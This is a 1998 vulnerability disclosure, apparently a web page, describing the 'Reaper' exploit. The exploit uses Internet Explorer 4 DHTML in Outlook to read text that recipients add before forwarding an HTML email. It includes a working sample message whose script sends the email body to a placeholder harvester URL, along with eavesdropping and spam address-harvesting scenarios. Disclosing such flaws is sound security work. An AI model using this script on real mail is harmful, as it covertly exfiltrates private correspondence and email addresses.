Reaper Exploit


Last update: November 29, 1998, by C. Voth <rxd 'at' bigfoot 'dot' com>

ABSTRACT

Discovered October 5, 1998 by Carl Voth, this exploit uses features of Microsoft Dynamic HTML to surreptitiously intercept text added to email messages after they have been forwarded to secondary recipients. The exploit assumes that the original exploit message will eventually be forwarded to others with HTML-enabled mail browsers.

AFFECTED APPLICATIONS

The exploit takes advantage of DHTML functionality in Internet Explorer 4.0 which is used by Outlook 98. Outlook Express has not been tested but is presumed to be equally vulnerable. Any other email clients that use Internet Explorer as their HTML engine (eg. Eudora?) are likely vulnerable as well. The JavaScript content is easily coded to survive forwarding through other HTML-based email clients even if they do not support the features in question. It is important to note, therefore, that the user of Netscape Mail (for example) is also indirectly vulnerable to this exploit if he forwards such a message directly or indirectly to a user of an Internet Explorer based client.

DESCRIPTION

The Microsoft implementation of DHTML adds a member to the document object called document.body.innerText which can be used to read the entire contents of the BODY element. Members innerHTML, outerText, and outerHTML can all be used to achieve similar results. Normally, these members provide the content author with the ability only to read back content he originally provided. However, when used in an email message, the BODY element includes the original message as well as any subsequent modifications made by the recipient in anticipation of forwarding the message to others. Any JavaScript content is also retained when such a message is forwarded to others. Therefore, each time a subsequent recipient of the forwarded message opens it, the script runs again and is able to harvest any modifications made by the forwarder.

To complete the exploit, content must somehow be sent to the "attacker" without the knowledge of the recipients. Richard M. Smith (rms 'at' pharlap 'dot' com) recently posted an explanation of how this is done using the GET method of data submission. For this to work, the email recipient must be connected to the Internet at the time of opening the message and must be capable of accessing a server-side script on a web server of the attacker's choosing. If this is not true, the attacker may still achieve his goal if the recipient then forwards the message to someone else who does read messages online.

Sample code is provided at the end of this document.

APPLICATION #1 - Eavesdropping

Person A believes that if he sends a particular message to person B, that B will modify or add to the content and then forward this edited message to person C without the knowledge of A. With the aid of this exploit, person A can learn what was sent to C without the knowledge of either B or C.

APPLICATION #2 - Spammer's Mailing List

Common on the Internet today are email virus hoaxes and chain letters that naive users forward indiscriminately. An unrelated fact is that "spammers" scan newsgroups and other sources to collect email addresses for their mailing lists. Spammers are fought to some degree by using fake email addresses in newsgroup postings. With this exploit, a spammer can craft an email hoax or chain letter that can be used to harvest "known good" email addresses. The exploit script is easily modified to efficiently extract the email addresses which commonly appear in the forwarding information inserted above the original content by the mail client. The unfortunate extent to which such emails are forwarded is likely to net the spammer a large list. Aside from the rare typo, the list of email addresses will all be confirmed good rather than fake. It also gives access to addresses of people that do not generally frequent the scannable newsgroups.

CONCLUSIONS

There are three fundamental reasons why this exploit is possible:

  1. The attacker's executable content survives the forwarding process without the knowledge of the victims. This could be viewed as analogous to a script in one browser frame written by one author being able to access the frame content belonging to another author.
  2. The BODY element content is readable by the script and all subsequent forwarding edits are performed within the same element.
  3. Data submission to remote servers using the GET method is possible without the knowledge of the victim.

It is left to the experts to discern how these facts violate the security model for JavaScript. One way or another, a fix is certainly needed, since the vulnerability of even the most security conscious users is a function of the vulnerability of other user's client configurations.

It is important to realize that although other HTML-capable clients may not be directly vulnerable to this exploit, they are certainly indirectly vulnerable and contribute to the problem if they are designed to forward executable content. This is true of the Mail component of Netscape Communicator 4 and is most likely true of others as well.

Microsoft was informed of this exploit November 2, 1998 and responded November 18, 1998. Outlook and Outlook Express development teams conceded there is an issue, but Microsoft claims a tradeoff is necessary between their customers' desire for scripting in email and "the need to mitigate security risks". Their solution is to suggest that the customer can choose to prevent such attacks by turning off email scripting. Future Microsoft products will warn users when scripted content is present.

As stated earlier, since one user's vulnerability is a function of another user's client configuration, Microsoft's solution is not sufficient.

SAMPLE SCRIPT

What follows is a sample exploit message. Varied server-side script solutions are possible - none will be provided.

Note that version checking is done to keep the script benign unless Internet Explorer 4 or better is detected. Testing other versions may show that this can be broadened.

--Start of Reaper Exploit Sample Message-------------------------------
<HTML>
<!-- Reaper Exploit - (c) 1998 Carl Voth. All rights reserved. -->
<HEAD><TITLE>Reaper Exploit</TITLE></HEAD>
<BODY>
<P>All text up to and including this paragraph will be harvested and
delivered upon opening the scripted version of this message.</P>
<SCRIPT>
<!--
// Reaper will scan text preceding this script and submit to waiting
// server-side script.
var dropbox = "http://any-site.web/cgi-bin/harvester.pl?"

// Is function derived from code sample acquired from
// http://developer.netscape.com/docs/examples/
function Is ()
  {
  var agt=navigator.userAgent.toLowerCase()
  this.major = parseInt(navigator.appVersion)
  this.minor = parseFloat(navigator.appVersion)
  this.ie = (agt.indexOf("msie") != -1)
  this.ie3 = (this.ie && (this.major == 2))
  this.ie4 = (this.ie && (this.major == 4))
  this.ie4up = this.ie  && (this.major >= 4)
  }

var is;
var isIE3Mac = false;
if ((navigator.appVersion.indexOf("Mac")!=-1) &&
    (navigator.userAgent.indexOf("MSIE")!=-1) &&
    (parseInt(navigator.appVersion)==3))
  isIE3Mac = true;
else 
  is = new Is(); 
if (!isIE3Mac && is.ie4up)  // IE4 or later
  {
  var payload;
  payload = document.body.innerText;
  if (payload && navigator.onLine)
    {
    var harvest = new Image();
    harvest.src = dropbox + "payload=" + escape(payload);
    }
  }
else
  {
  // Any other client vulnerable to variant of this exploit?
  }
// -->
</SCRIPT>
<!-- Reaper does not harvest the text which follows. -->
<P>The sky is falling! Forward this to your friends.</P>
</BODY>
</HTML>
--End of Reaper Exploit Sample Message---------------------------------

Copyright 1998 Carl Voth. All rights reserved.

This page has been hit times.

1